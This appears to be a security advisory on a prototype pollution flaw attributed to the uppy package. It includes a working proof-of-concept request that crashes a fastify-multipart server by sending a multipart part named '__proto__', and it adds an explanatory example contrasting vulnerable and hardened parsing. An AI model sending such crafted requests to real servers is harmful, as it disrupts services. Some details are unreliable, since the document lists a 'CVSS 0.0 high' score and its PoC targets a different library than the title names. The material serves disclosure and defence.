Prototype Pollution Affecting uppy package, versions <1.9.3


Snyk CVSS: 0.0 high
    Attack Complexity: Low
    Confidentiality: High

Threat Intelligence
    Exploit Maturity: Proof of concept
    EPSS: 0.6% (79th percentile)

NVD: 9.8 critical

  • Snyk ID SNYK-JS-UPPY-559068
  • published 28 Feb 2020
  • disclosed 28 Feb 2020
  • credit Eran Hammer, Matteo Collina

How to fix?

Upgrade uppy to version 1.9.3 or higher.

Overview

uppy is a sleek, modular JavaScript file uploader that integrates seamlessly with any application.

Affected versions of this package are vulnerable to Prototype Pollution. It is possible to crash a remote server that parses multipart requests by sending a specially crafted request.

PoC

// Server side: fastify with fastify-multipart, attaching parsed parts to req.body
// by their field name (addToBody). The onFile hook only drains each file stream.
const http = require('http');
const fastify = require('fastify')();
const options = {
    addToBody: true,
    onFile: (fieldName, stream, filename, encoding, mimetype, body) => {
        stream.resume();
    }
};
fastify.register(require('fastify-multipart'), options);
fastify.post('/', function (req, reply) {
    console.log(req.body.toString());
    reply.code(200).send();
});
fastify.listen(3000, () => {
    console.log(`server listening on ${fastify.server.address().port}`);
    // Client side: once listening, post a multipart body whose single part is
    // named "__proto__", the field name that reaches the body's prototype setter.
    const body =
        '--AaB03x\r\n' +
        'content-disposition: form-data; name="__proto__"; filename="file1.txt"\r\n' +
        'Content-Type: text/plain\r\n' +
        '\r\n' +
        '... contents of file1.txt ...\r\r\n' +
        '--AaB03x--\r\n';
    const r = {
        hostname: 'localhost',
        port: 3000,
        path: '/',
        method: 'POST',
        headers: {
            'content-type': 'multipart/form-data; boundary=AaB03x'
        }
    };
    const req = http.request(r, (res) => { });
    req.write(body);
    req.end();
});
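The following is an added illustration, not code from the advisory, from uppy, or from fastify-multipart. It shows why a multipart part named "__proto__" pollutes a body object that collects fields by name on a plain object, and how a parser can collect the same fields without that risk. The parsed-part shape ({ name, value }), the sample parts, and the function names are assumptions made for this example.

```javascript
// Added example (not part of the Snyk advisory or any library's code):
// a vulnerable field-collection pattern beside a hardened one.

// Constructed sample of already-parsed multipart parts. The { name, value }
// shape is an assumption for this example, not a real library's data structure.
const SAMPLE_PARTS = [
  { name: 'title', value: 'quarterly report' },
  // a part named "__proto__" carrying an object, as in the advisory's PoC
  { name: '__proto__', value: { filename: 'file1.txt', mimetype: 'text/plain' } },
];

// Vulnerable pattern: assign every part onto a plain object keyed by field name.
// On a plain object, "__proto__" is not stored as a property; it hits the
// inherited prototype setter, so the attacker-supplied object becomes the
// body's prototype and its keys appear on the body as inherited values.
function naiveCollect(parts) {
  const body = {};
  for (const part of parts) {
    body[part.name] = part.value;
  }
  return body;
}

// Field names that can reach the prototype chain or the constructor.
const FORBIDDEN_NAMES = new Set(['__proto__', 'constructor', 'prototype']);

// Hardened pattern: a null-prototype object has no __proto__ setter, so any
// key becomes an ordinary own property. Forbidden names are additionally
// rejected and reported so the caller can fail the request explicitly.
function safeCollect(parts) {
  const body = Object.create(null);
  const rejected = [];
  for (const part of parts) {
    if (FORBIDDEN_NAMES.has(part.name)) {
      rejected.push(part.name);
      continue;
    }
    body[part.name] = part.value;
  }
  return { body, rejected };
}

// Summarize what each strategy produced so the difference is visible.
function describe(parts) {
  const naive = naiveCollect(parts);
  const safe = safeCollect(parts);
  return {
    naiveOwnKeys: Object.keys(naive),
    // "filename" was never a submitted field, yet it resolves via the polluted prototype
    naiveInheritedFilename: naive.filename,
    naivePrototypeReplaced: Object.getPrototypeOf(naive) !== Object.prototype,
    safeOwnKeys: Object.keys(safe.body),
    safeRejected: safe.rejected,
    safeHasPrototype: Object.getPrototypeOf(safe.body) !== null,
  };
}

console.log(describe(SAMPLE_PARTS));
```

Run with node to see the two results side by side: the naive body has only one own key ("title") but answers to "filename" through its replaced prototype, while the hardened body keeps "title" as its only property, has no prototype at all, and reports "__proto__" as rejected. The null-prototype object is what actually closes the hole; the name check is defense in depth that also gives the request handler something concrete to log and reject.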